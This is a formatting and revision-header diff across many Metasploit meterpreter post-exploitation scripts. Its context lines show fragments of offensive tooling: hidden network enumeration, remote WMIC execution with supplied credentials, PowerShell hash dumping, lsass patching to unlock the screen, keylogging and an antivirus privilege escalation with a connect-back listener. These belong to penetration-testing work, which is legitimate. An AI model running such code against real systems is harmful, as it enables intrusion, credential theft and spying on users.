diff --git a/scripts/meterpreter/hostsedit.rb b/scripts/meterpreter/hostsedit.rb
index 40f1b1a2bf..f86fe6e5ba 100644
--- a/scripts/meterpreter/hostsedit.rb
+++ b/scripts/meterpreter/hostsedit.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
# Meterpreter script for modifying the hosts file in windows
# given a single entrie or several in a file and clear the
# DNS cache on the target machine.
diff --git a/scripts/meterpreter/keylogrecorder.rb b/scripts/meterpreter/keylogrecorder.rb
index ae8f202f5a..62965a9d27 100644
--- a/scripts/meterpreter/keylogrecorder.rb
+++ b/scripts/meterpreter/keylogrecorder.rb
@@ -87,7 +87,7 @@ def startkeylogger(session)
begin
#print_status("Grabbing Desktop Keyboard Input...")
#session.ui.grab_desktop
- print_status("Starting the keystroke sniffer...")
+ print_status("Starting the keystroke sniffer...")
session.ui.keyscan_start
return true
rescue
diff --git a/scripts/meterpreter/killav.rb b/scripts/meterpreter/killav.rb
index bc48fc440f..a631f01f1f 100644
--- a/scripts/meterpreter/killav.rb
+++ b/scripts/meterpreter/killav.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Meterpreter script that kills all Antivirus processes
# Provided by: Jerome Athias
diff --git a/scripts/meterpreter/metsvc.rb b/scripts/meterpreter/metsvc.rb
index 5cec941082..f1087e53ac 100644
--- a/scripts/meterpreter/metsvc.rb
+++ b/scripts/meterpreter/metsvc.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Meterpreter script for installing the meterpreter service
diff --git a/scripts/meterpreter/migrate.rb b/scripts/meterpreter/migrate.rb
index 34bacad9fd..e2f42bc739 100644
--- a/scripts/meterpreter/migrate.rb
+++ b/scripts/meterpreter/migrate.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Simple example script that migrates to a specific process by name.
# This is meant as an illustration.
diff --git a/scripts/meterpreter/multi_console_command.rb b/scripts/meterpreter/multi_console_command.rb
index d63b5e888c..7fe7850a33 100644
--- a/scripts/meterpreter/multi_console_command.rb
+++ b/scripts/meterpreter/multi_console_command.rb
@@ -11,10 +11,11 @@
# Setting Arguments
@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false,"Help menu." ],
- "-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."],
- "-rc" => [ true,"Text file with list of commands, one per line."]
+ "-h" => [ false,"Help menu." ],
+ "-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."],
+ "-rc" => [ true,"Text file with list of commands, one per line."]
)
+
#Setting Argument variables
commands = []
script = []
@@ -46,30 +47,29 @@ def usage
end
################## Main ##################
@@exec_opts.parse(args) { |opt, idx, val|
- case opt
-
- when "-cl"
- commands = val.split(",")
- when "-rc"
- script = val
- if not ::File.exists?(script)
- raise "Command List File does not exists!"
- else
- ::File.open(script, "r").each_line do |line|
- commands << line.chomp
- end
- end
-
- when "-h"
- help = 1
- end
-
+ case opt
+
+ when "-cl"
+ commands = val.split(",")
+ when "-rc"
+ script = val
+ if not ::File.exists?(script)
+ raise "Command List File does not exists!"
+ else
+ ::File.open(script, "r").each_line do |line|
+ commands << line.chomp
+ end
+ end
+
+ when "-h"
+ help = 1
+ end
}
if args.length == 0 or help == 1
usage
else
- list_con_exec(commands)
- raise Rex::Script::Completed
+ list_con_exec(commands)
+ raise Rex::Script::Completed
end
diff --git a/scripts/meterpreter/multicommand.rb b/scripts/meterpreter/multicommand.rb
index dc105c0496..707b292bef 100644
--- a/scripts/meterpreter/multicommand.rb
+++ b/scripts/meterpreter/multicommand.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#Meterpreter script for running multiple commands on Windows 2003, Windows Vista
# and Windows XP and Windows 2008 targets.
#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
@@ -8,10 +9,10 @@ session = client
wininfo = client.sys.config.sysinfo
# Setting Arguments
@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false,"Help menu." ],
- "-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."],
- "-f" => [ true,"File where to saved output of command."],
- "-rc" => [ true,"Text file with list of commands, one per line."]
+ "-h" => [ false,"Help menu." ],
+ "-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."],
+ "-f" => [ true,"File where to saved output of command."],
+ "-rc" => [ true,"Text file with list of commands, one per line."]
)
#Setting Argument variables
commands = []
@@ -52,11 +53,11 @@ def list_exec(session,cmdlst)
end
# Function for writing results of other functions to a file
def filewrt(file2wrt, data2wrt)
- output = ::File.open(file2wrt, "a")
- data2wrt.each_line do |d|
- output.puts(d)
- end
- output.close
+ output = ::File.open(file2wrt, "a")
+ data2wrt.each_line do |d|
+ output.puts(d)
+ end
+ output.close
end
def usage
diff --git a/scripts/meterpreter/multiscript.rb b/scripts/meterpreter/multiscript.rb
index fbfb18700e..c798ca1452 100644
--- a/scripts/meterpreter/multiscript.rb
+++ b/scripts/meterpreter/multiscript.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#Meterpreter script for running multiple scripts on a Meterpreter Session
#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
#Verion: 0.2
diff --git a/scripts/meterpreter/netenum.rb b/scripts/meterpreter/netenum.rb
index e9d33a6f51..fd07509429 100644
--- a/scripts/meterpreter/netenum.rb
+++ b/scripts/meterpreter/netenum.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
#Meterpreter script for ping sweeps on Windows 2003, Windows Vista
#Windows 2008 and Windows XP targets using native windows commands.
@@ -7,16 +8,15 @@
#Note:
################## Variable Declarations ##################
@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu."],
- "-r" => [ true, "The target address range or CIDR identifier"],
- "-ps" => [ false, "To Perform Ping Sweep on IP Range"],
- "-rl" => [ false, "To Perform DNS Reverse Lookup on IP Range"],
- "-fl" => [ false, "To Perform DNS Forward Lookup on host list and domain"],
- "-hl" => [ true, "File with Host List for DNS Forward Lookup"],
- "-d" => [ true, "Domain Name for DNS Forward Lookup"],
- "-st" => [ false, "To Perform DNS lookup of MX and NS records for a domain"],
- "-sr" => [ false, "To Perform Service Record DNS lookup for a domain"]
-
+ "-h" => [ false, "Help menu."],
+ "-r" => [ true, "The target address range or CIDR identifier"],
+ "-ps" => [ false, "To Perform Ping Sweep on IP Range"],
+ "-rl" => [ false, "To Perform DNS Reverse Lookup on IP Range"],
+ "-fl" => [ false, "To Perform DNS Forward Lookup on host list and domain"],
+ "-hl" => [ true, "File with Host List for DNS Forward Lookup"],
+ "-d" => [ true, "Domain Name for DNS Forward Lookup"],
+ "-st" => [ false, "To Perform DNS lookup of MX and NS records for a domain"],
+ "-sr" => [ false, "To Perform Service Record DNS lookup for a domain"]
)
session = client
host,port = session.tunnel_peer.split(':')
@@ -44,15 +44,15 @@ def stdlookup(session,domain,dest)
results = []
garbage = []
types.each do |t|
- begin
- r = session.sys.process.execute("nslookup -type=#{t} #{domain}", nil, {'Hidden' => true, 'Channelized' => true})
- while(d = r.channel.read)
- mxout << d
- end
- r.channel.close
- r.close
- results = mxout.join.split(/\n/)
- results.each do |rec|
+ begin
+ r = session.sys.process.execute("nslookup -type=#{t} #{domain}", nil, {'Hidden' => true, 'Channelized' => true})
+ while(d = r.channel.read)
+ mxout << d
+ end
+ r.channel.close
+ r.close
+ results = mxout.join.split(/\n/)
+ results.each do |rec|
if rec.match(/\s*internet\saddress\s\=\s/)
garbage << rec.split(/\s*internet\saddress\s\=/)
print_status("#{garbage[0].join.sub(" "," ")} #{t} ")
@@ -60,13 +60,14 @@ def stdlookup(session,domain,dest)
garbage.clear
end
garbage.clear
+ end
+
+ rescue ::Exception => e
+ print_status("The following Error was encountered: #{e.class} #{e}")
end
-
- rescue ::Exception => e
- print_status("The following Error was encountered: #{e.class} #{e}")
- end
end
end
+
#-------------------------------------------------------------------------------
# Function for writing results of other functions to a file
def filewrt(file2wrt, data2wrt)
@@ -76,6 +77,7 @@ def filewrt(file2wrt, data2wrt)
end
output.close
end
+
#-------------------------------------------------------------------------------
# Function for Executing Reverse lookups
def reverselookup(session,iprange,dest)
@@ -86,49 +88,50 @@ def reverselookup(session,iprange,dest)
i, a = 0, []
begin
ipadd = Rex::Socket::RangeWalker.new(iprange)
- numip = ipadd.num_ips
- while (iplst.length < numip)
- ipa = ipadd.next_ip
- if (not ipa)
- break
- end
- iplst << ipa
- end
+ numip = ipadd.num_ips
+ while (iplst.length < numip)
+ ipa = ipadd.next_ip
+ if (not ipa)
+ break
+ end
+ iplst << ipa
+ end
begin
- iplst.each do |ip|
- if i < 10
- a.push(::Thread.new {
- r = session.sys.process.execute("nslookup #{ip}", nil, {'Hidden' => true, 'Channelized' => true})
- while(d = r.channel.read)
- if d =~ /(Name)/
- d.scan(/Name:\s*\S*\s/) do |n|
- hostname = n.split(": ")
- print_status "\t #{ip} is #{hostname[1].chomp("\n")}"
- filewrt(dest,"#{ip} is #{hostname[1].chomp("\n")}")
- end
- break
-
- end
-
- end
-
- r.channel.close
- r.close
-
- })
- i += 1
- else
- sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
- i = 0
- end
- end
- a.delete_if {|x| not x.alive?} while not a.empty?
- end
+ iplst.each do |ip|
+ if i < 10
+ a.push(::Thread.new {
+ r = session.sys.process.execute("nslookup #{ip}", nil, {'Hidden' => true, 'Channelized' => true})
+ while(d = r.channel.read)
+ if d =~ /(Name)/
+ d.scan(/Name:\s*\S*\s/) do |n|
+ hostname = n.split(": ")
+ print_status "\t #{ip} is #{hostname[1].chomp("\n")}"
+ filewrt(dest,"#{ip} is #{hostname[1].chomp("\n")}")
+ end
+ break
+
+ end
+
+ end
+
+ r.channel.close
+ r.close
+
+ })
+ i += 1
+ else
+ sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
+ i = 0
+ end
+ end
+ a.delete_if {|x| not x.alive?} while not a.empty?
+ end
rescue ::Exception => e
- print_status("The following Error was encountered: #{e.class} #{e}")
-
+ print_status("The following Error was encountered: #{e.class} #{e}")
+
end
end
+
#-------------------------------------------------------------------------------
#Function for Executing Forward Lookups
def frwdlp(session,hostlst,domain,dest)
@@ -139,38 +142,39 @@ def frwdlp(session,hostlst,domain,dest)
threads = []
tmpout = []
begin
- if ::File.exists?(hostlst)
- ::File.open(hostlst).each {|line|
- threads << ::Thread.new(line) { |h|
- #print_status("checking #{h.chomp}")
- r = session.sys.process.execute("nslookup #{h.chomp}.#{domain}", nil, {'Hidden' => true, 'Channelized' => true})
- while(d = r.channel.read)
- if d =~ /(Name)/
- d.scan(/Name:\s*\S*\s*Address\w*:\s*.*?.*?.*/) do |n|
- tmpout << n.split
- end
- break
- end
- end
-
- r.channel.close
- r.close
+ if ::File.exists?(hostlst)
+ ::File.open(hostlst).each {|line|
+ threads << ::Thread.new(line) { |h|
+ #print_status("checking #{h.chomp}")
+ r = session.sys.process.execute("nslookup #{h.chomp}.#{domain}", nil, {'Hidden' => true, 'Channelized' => true})
+ while(d = r.channel.read)
+ if d =~ /(Name)/
+ d.scan(/Name:\s*\S*\s*Address\w*:\s*.*?.*?.*/) do |n|
+ tmpout << n.split
+ end
+ break
+ end
+ end
+
+ r.channel.close
+ r.close
+ }
}
- }
- threads.each { |aThread| aThread.join }
- tmpout.uniq.each do |t|
- print_status("\t#{t.join.sub(/Address\w*:/, "\t")}")
- filewrt(dest,"#{t.join.sub(/Address\w*:/, "\t")}")
- end
-
- else
- print_status("File #{hostlst}does not exists!")
- exit
- end
+ threads.each { |aThread| aThread.join }
+ tmpout.uniq.each do |t|
+ print_status("\t#{t.join.sub(/Address\w*:/, "\t")}")
+ filewrt(dest,"#{t.join.sub(/Address\w*:/, "\t")}")
+ end
+
+ else
+ print_status("File #{hostlst}does not exists!")
+ exit
+ end
rescue ::Exception => e
- print_status("The following Error was encountered: #{e.class} #{e}")
+ print_status("The following Error was encountered: #{e.class} #{e}")
end
end
+
#-------------------------------------------------------------------------------
#Function for Executing Ping Sweep
def pingsweep(session,iprange,dest)
@@ -184,42 +188,42 @@ def pingsweep(session,iprange,dest)
numip = ipadd.num_ips
while (iplst.length < numip)
ipa = ipadd.next_ip
- if (not ipa)
- break
- end
+ if (not ipa)
+ break
+ end
iplst << ipa
end
begin
- iplst.each do |ip|
- if i < 10
- a.push(::Thread.new {
- r = session.sys.process.execute("ping #{ip} -n 1", nil, {'Hidden' => true, 'Channelized' => true})
- while(d = r.channel.read)
- if d =~ /(Reply)/
- print_status "\t#{ip} host found"
- filewrt(dest,"#{ip} host found")
- r.channel.close
- elsif d =~ /(Antwort)/
- print_status "\t#{ip} host found"
- filewrt(dest,"#{ip} host found")
- r.channel.close
- end
- end
- r.channel.close
- r.close
-
- })
- i += 1
- else
- sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
- i = 0
- end
- end
- a.delete_if {|x| not x.alive?} while not a.empty?
- end
+ iplst.each do |ip|
+ if i < 10
+ a.push(::Thread.new {
+ r = session.sys.process.execute("ping #{ip} -n 1", nil, {'Hidden' => true, 'Channelized' => true})
+ while(d = r.channel.read)
+ if d =~ /(Reply)/
+ print_status "\t#{ip} host found"
+ filewrt(dest,"#{ip} host found")
+ r.channel.close
+ elsif d =~ /(Antwort)/
+ print_status "\t#{ip} host found"
+ filewrt(dest,"#{ip} host found")
+ r.channel.close
+ end
+ end
+ r.channel.close
+ r.close
+
+ })
+ i += 1
+ else
+ sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
+ i = 0
+ end
+ end
+ a.delete_if {|x| not x.alive?} while not a.empty?
+ end
rescue ::Exception => e
- print_status("The following Error was encountered: #{e.class} #{e}")
-
+ print_status("The following Error was encountered: #{e.class} #{e}")
+
end
end
#-------------------------------------------------------------------------------
@@ -229,9 +233,10 @@ def srvreclkp(session,domain,dest)
srout = []
garbage = []
srvrcd = [
- "_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp.","_test._tcp.",
- "_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.",
- "_ftp._tcp.","_http._tcp.","_nntp._tcp.","_telnet._tcp.","_whois._tcp."]
+ "_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp.","_test._tcp.",
+ "_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.",
+ "_ftp._tcp.","_http._tcp.","_nntp._tcp.","_telnet._tcp.","_whois._tcp."
+ ]
print_status("Performing SRV Record Enumeration for #{domain}")
filewrt(dest,"SRV Record Enumeration for #{domain}")
srvrcd.each do |srv|
@@ -276,33 +281,33 @@ srvrc = nil
# Parsing of Options
@@exec_opts.parse(args) { |opt, idx, val|
case opt
- when "-sr"
- srvrc = 1
- when "-rl"
- rvrslkp = 1
- when "-fl"
- frdlkp = 1
- when "-ps"
- pngsp = 1
- when "-st"
- stdlkp = 1
- when "-d"
- dom = val
- when "-hl"
- hostlist = val
- when "-r"
- range = val
-
- when "-h"
- print(
- "Network Enumerator Meterpreter Script\n" +
- "Usage:\n" +
- @@exec_opts.usage
- )
- helpcall = 1
- end
-
+ when "-sr"
+ srvrc = 1
+ when "-rl"
+ rvrslkp = 1
+ when "-fl"
+ frdlkp = 1
+ when "-ps"
+ pngsp = 1
+ when "-st"
+ stdlkp = 1
+ when "-d"
+ dom = val
+ when "-hl"
+ hostlist = val
+ when "-r"
+ range = val
+
+ when "-h"
+ print(
+ "Network Enumerator Meterpreter Script\n" +
+ "Usage:\n" +
+ @@exec_opts.usage
+ )
+ helpcall = 1
+ end
}
+
if client.platform =~ /win32|win64/
if range != nil && pngsp == 1
message(logs)
@@ -320,10 +325,9 @@ if client.platform =~ /win32|win64/
message(logs)
srvreclkp(session,dom,dest)
elsif helpcall == nil
- print(
- "Network Enumerator Meterpreter Script\n" +
- "Usage: \n" +
- @@exec_opts.usage)
+ print("Network Enumerator Meterpreter Script\n" +
+ "Usage: \n" +
+ @@exec_opts.usage)
end
else
diff --git a/scripts/meterpreter/panda_2007_pavsrv51.rb b/scripts/meterpreter/panda_2007_pavsrv51.rb
index eb8ea21edf..1965d47e43 100644
--- a/scripts/meterpreter/panda_2007_pavsrv51.rb
+++ b/scripts/meterpreter/panda_2007_pavsrv51.rb
@@ -1,4 +1,5 @@
# $Id: panda_2007_pavsrv51.rb 8734 2010-03-07 22:49:08Z mc $
+# $Revision: $
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -13,7 +14,7 @@
# local attacker can gain elevated privileges.
#
# This script has only been tested against Panda Antivirus 2007.
-#
+#
# BID - 4257
# mc[@]metasploit.com
##
@@ -22,9 +23,9 @@
# Options
#
opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "This help menu"],
- "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
- "-p" => [ true, "The port on the remote host where Metasploit is listening"]
+ "-h" => [ false, "This help menu"],
+ "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
+ "-p" => [ true, "The port on the remote host where Metasploit is listening"]
)
#
@@ -38,16 +39,16 @@ rport = 4444
# Option parsing
#
opts.parse(args) do |opt, idx, val|
- case opt
- when "-h"
- print_status("Panda Antivirus 2007 privilege escalation.")
+ case opt
+ when "-h"
+ print_status("Panda Antivirus 2007 privilege escalation.")
print_line(opts.usage)
raise Rex::Script::Completed
- when "-r"
- rhost = val
- when "-p"
- rport = val.to_i
- end
+ when "-r"
+ rhost = val
+ when "-p"
+ rport = val.to_i
+ end
end
if client.platform =~ /win32|win64/
client.sys.process.get_processes().each do |m|
diff --git a/scripts/meterpreter/pml_driver_config.rb b/scripts/meterpreter/pml_driver_config.rb
index 9c022505f1..f004237842 100644
--- a/scripts/meterpreter/pml_driver_config.rb
+++ b/scripts/meterpreter/pml_driver_config.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
diff --git a/scripts/meterpreter/powerdump.rb b/scripts/meterpreter/powerdump.rb
index b50480c07b..772efa94b1 100644
--- a/scripts/meterpreter/powerdump.rb
+++ b/scripts/meterpreter/powerdump.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Meterpreter script for utilizing purely PowerShell to extract username and password hashes through registry
# keys. This script requires you to be running as system in order to work properly. This has currently been
@@ -46,12 +47,12 @@ def dumphash(session)
begin
while ((data = hashes.read) != nil)
data=data.strip
- puts(data)
+ print_line(data)
end
rescue EOFError
ensure
hashes.close
- end
+ end
print_status("Setting Execution policy back to Restricted...")
session.sys.process.execute("powershell Set-ExecutionPolicy Unrestricted", nil, {'Hidden' => 'true', 'Channelized' => true})
print_status("Cleaning up after ourselves...")
diff --git a/scripts/meterpreter/prefetchtool.rb b/scripts/meterpreter/prefetchtool.rb
index 8f90ebf8db..0623cc20f8 100644
--- a/scripts/meterpreter/prefetchtool.rb
+++ b/scripts/meterpreter/prefetchtool.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#Meterpreter script for extracting information from windows prefetch folder
#Provided by Milo at keith.lee2012[at]gmail.com
#Verion: 0.1.0
@@ -12,13 +13,13 @@ require 'digest/sha1'
# Script Options
@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu."],
- "-p" => [ false, "List Installed Programs"],
- "-c" => [ false, "Disable SHA1/MD5 checksum"],
- "-x" => [ true, "Top x Accessed Executables (Based on Prefetch folder)"],
- "-i" => [ false, "Perform lookup for software name"],
- "-l" => [ false, "Download Prefetch Folder Analysis Log"]
- )
+ "-h" => [ false, "Help menu."],
+ "-p" => [ false, "List Installed Programs"],
+ "-c" => [ false, "Disable SHA1/MD5 checksum"],
+ "-x" => [ true, "Top x Accessed Executables (Based on Prefetch folder)"],
+ "-i" => [ false, "Perform lookup for software name"],
+ "-l" => [ false, "Download Prefetch Folder Analysis Log"]
+)
@tempdir = @session.fs.file.expand_path("%TEMP%")
diff --git a/scripts/meterpreter/process_memdump.rb b/scripts/meterpreter/process_memdump.rb
index a5a404341d..2b3c18560a 100644
--- a/scripts/meterpreter/process_memdump.rb
+++ b/scripts/meterpreter/process_memdump.rb
@@ -27,9 +27,9 @@ opts.parse(args) { |opt, idx, val|
when "-h"
print_line("")
print_line("USAGE:")
- print_line("EXAMPLE: run process_dump putty.exe")
- print_line("EXAMPLE: run process_dump -p 1234")
- print_line(opts.usage)
+ print_line("EXAMPLE: run process_dump putty.exe")
+ print_line("EXAMPLE: run process_dump -p 1234")
+ print_line(opts.usage)
raise Rex::Script::Completed
when "-p"
pid = val
@@ -40,15 +40,15 @@ opts.parse(args) { |opt, idx, val|
when "-q"
query = true
when "-r"
- list = val
+ list = val
resource = ""
- if not ::File.exists?(list)
- raise "Command List File does not exists!"
- else
- ::File.open(list, "r").each_line do |line|
- resource << line
- end
- end
+ if not ::File.exists?(list)
+ raise "Command List File does not exists!"
+ else
+ ::File.open(list, "r").each_line do |line|
+ resource << line
+ end
+ end
end
}
@@ -107,7 +107,7 @@ def dump_mem(pid,name, toggle)
base_size += mbi["RegionSize"]
end
print_status("Saving Dumped Memory to #{dumpfile}")
-
+
end
# Function to query process Size
diff --git a/scripts/meterpreter/remotewinenum.rb b/scripts/meterpreter/remotewinenum.rb
index 22c68f4fc6..068a4b8512 100644
--- a/scripts/meterpreter/remotewinenum.rb
+++ b/scripts/meterpreter/remotewinenum.rb
@@ -11,10 +11,10 @@ rpass = nil
trg = ""
# Script Options
@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu."],
- "-t" => [ true, "The target address"],
- "-u" => [ true, "User on the target system (If not provided it will use credential of process)"],
- "-p" => [ true, "Password of user on target system"]
+ "-h" => [ false, "Help menu."],
+ "-t" => [ true, "The target address"],
+ "-u" => [ true, "User on the target system (If not provided it will use credential of process)"],
+ "-p" => [ true, "Password of user on target system"]
)
# Create Filename info to be appended to downloaded files
@@ -57,28 +57,28 @@ def wmicexec(session,wmic,user,pass,trgt)
tmpout = ''
command = nil
runfail = 0
- runningas = session.sys.config.getuid
+ runningas = session.sys.config.getuid
begin
- tmp = session.fs.file.expand_path("%TEMP%")
- # Temporary file on windows host to store results
- wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
-
- wmic.each do |wmi|
- if user == nil
- print_status("The commands will be ran under the credentials of #{runningas}")
- command = "/node:#{trgt} /append:#{wmicfl} #{wmi}"
- else
- command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}"
- end
- print_status "\trunning command wimic #{wmi}"
- r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
- sleep(1)
- r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'})
- sleep(1)
- r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
- sleep(1)
- #print_status "\twmic #{command}"
- r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
+ tmp = session.fs.file.expand_path("%TEMP%")
+ # Temporary file on windows host to store results
+ wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
+
+ wmic.each do |wmi|
+ if user == nil
+ print_status("The commands will be ran under the credentials of #{runningas}")
+ command = "/node:#{trgt} /append:#{wmicfl} #{wmi}"
+ else
+ command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}"
+ end
+ print_status "\trunning command wimic #{wmi}"
+ r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
+ sleep(1)
+ r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'})
+ sleep(1)
+ r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
+ sleep(1)
+ #print_status "\twmic #{command}"
+ r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
#Making sure that wmic finishes before executing next wmic command
prog2check = "wmic.exe"
found = 0
@@ -92,17 +92,17 @@ def wmicexec(session,wmic,user,pass,trgt)
end
end
end
- r.close
- end
- # Read the output file of the wmic commands
- wmioutfile = session.fs.file.new(wmicfl, "rb")
- until wmioutfile.eof?
- tmpout << wmioutfile.read
- end
- # Close output file in host
- wmioutfile.close
+ r.close
+ end
+ # Read the output file of the wmic commands
+ wmioutfile = session.fs.file.new(wmicfl, "rb")
+ until wmioutfile.eof?
+ tmpout << wmioutfile.read
+ end
+ # Close output file in host
+ wmioutfile.close
rescue ::Exception => e
- print_status("Error running WMIC commands: #{e.class} #{e}")
+ print_status("Error running WMIC commands: #{e.class} #{e}")
end
# We delete the file with the wmic command output.
c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
@@ -123,21 +123,19 @@ def headerbuid(session,target,dest)
header << "\n\n\n"
print_status("Saving report to #{dest}")
- header
+ header
end
#------------------------------------------------------------------------------
# Function Help Message
def helpmsg
- print(
- "Remote Windows Enumeration Meterpreter Script\n" +
- "This script will enumerate windows hosts in the target enviroment\n" +
- "given a username and password or using the credential under witch\n" +
- "Meterpeter is running using WMI wmic windows native tool.\n" +
- "Usage:\n" +
- @@exec_opts.usage
- )
+ print("Remote Windows Enumeration Meterpreter Script\n" +
+ "This script will enumerate windows hosts in the target enviroment\n" +
+ "given a username and password or using the credential under witch\n" +
+ "Meterpeter is running using WMI wmic windows native tool.\n" +
+ "Usage:\n" +
+ @@exec_opts.usage)
end
################## MAIN ##################
if client.platform =~ /win32|win64/
diff --git a/scripts/meterpreter/scheduleme.rb b/scripts/meterpreter/scheduleme.rb
index af76c1bf2b..2190f46808 100644
--- a/scripts/meterpreter/scheduleme.rb
+++ b/scripts/meterpreter/scheduleme.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#Meterpreter script for automating the most common scheduling tasks
#during a pentest. This script will use the schtasks command so as
diff --git a/scripts/meterpreter/schelevator.rb b/scripts/meterpreter/schelevator.rb
index 39745b4a5f..b8081f7c3d 100644
--- a/scripts/meterpreter/schelevator.rb
+++ b/scripts/meterpreter/schelevator.rb
@@ -1,5 +1,6 @@
##
# $Id$
+# $Revision$
##
##
diff --git a/scripts/meterpreter/schtasksabuse.rb b/scripts/meterpreter/schtasksabuse.rb
index d698977950..12d0318911 100644
--- a/scripts/meterpreter/schtasksabuse.rb
+++ b/scripts/meterpreter/schtasksabuse.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#Meterpreter script for abusing the scheduler service in windows
#by scheduling and running a list of command against one or more targets
@@ -127,20 +128,20 @@ end
script = val
if not ::File.exists?(script)
raise "Command List File does not exists!"
- else
- ::File.open(script, "r").each_line do |line|
+ else
+ ::File.open(script, "r").each_line do |line|
commands << line.chomp
end
- end
+ end
when "-l"
list = val
if not ::File.exists?(list)
raise "Command List File does not exists!"
- else
- ::File.open(list, "r").each_line do |line|
+ else
+ ::File.open(list, "r").each_line do |line|
targets << line.chomp
end
- end
+ end
when "-h"
help = 1
end
diff --git a/scripts/meterpreter/screen_unlock.rb b/scripts/meterpreter/screen_unlock.rb
index 6f44439c35..c6e51123ce 100644
--- a/scripts/meterpreter/screen_unlock.rb
+++ b/scripts/meterpreter/screen_unlock.rb
@@ -1,10 +1,14 @@
#
+# $Id$
+#
# Script to unlock a windows screen by L4teral
# Needs system prvileges to run and known signatures for the target system.
# This script patches msv1_0.dll loaded by lsass.exe
#
# Based on the winlockpwn tool released by Metlstorm: http://www.storm.net.nz/projects/16
#
+# $Revision$
+#
revert = false
targets = [
@@ -40,7 +44,7 @@ os = client.sys.config.sysinfo['OS']
targets.each do |t|
if os =~ t[:os]
- target = t
+ target = t
print_status("OS '#{os}' found in known targets")
pid = client.sys.process["lsass.exe"]
p = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
diff --git a/scripts/meterpreter/screenspy.rb b/scripts/meterpreter/screenspy.rb
index 7cadba211b..e10eb2892e 100644
--- a/scripts/meterpreter/screenspy.rb
+++ b/scripts/meterpreter/screenspy.rb
@@ -1,7 +1,7 @@
# $Id$
# $Revision$
# Author:Roni Bachar (@roni_bachar) roni.bachar.blog@gmail.com
-#
+#
# Thie script will open an interactive view of remote hosts
# You will need firefox installed on your machine
@@ -9,9 +9,9 @@
require 'fileutils'
opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu." ],
- "-d" => [ true, "The Delay in seconds between each screenshot." ],
- "-t" => [ true, "The time to run in sec." ],
+ "-h" => [ false, "Help menu." ],
+ "-d" => [ true, "The Delay in seconds between each screenshot." ],
+ "-t" => [ true, "The time to run in sec." ],
"-s" => [ true, "The local system linux/windows" ]
)
@@ -22,28 +22,28 @@ meter_type = client.platform
localsys = "linux"
opts.parse(args) { |opt, idx, val|
- case opt
- when '-d'
- freq = val.to_i
- when '-t'
- count = val.to_i
+ case opt
+ when '-d'
+ freq = val.to_i
+ when '-t'
+ count = val.to_i
when '-s'
- localsys = val.to_s
-
- when "-h"
+ localsys = val.to_s
+
+ when "-h"
+ print_line
+ print_line "Screenspy v1.0"
+ print_line "--------------"
print_line
- print_line "Screenspy v1.0"
- print_line "--------------"
- print_line
print_line
print_line "Usage: bgrun screenspy -t 20 -d 1 => will take interactive Screenshot every sec for 20 sec long."
print_line "Usage: bgrun screenspy -t 60 -d 5 => will take interactive Screenshot every 5 sec for 1 min long."
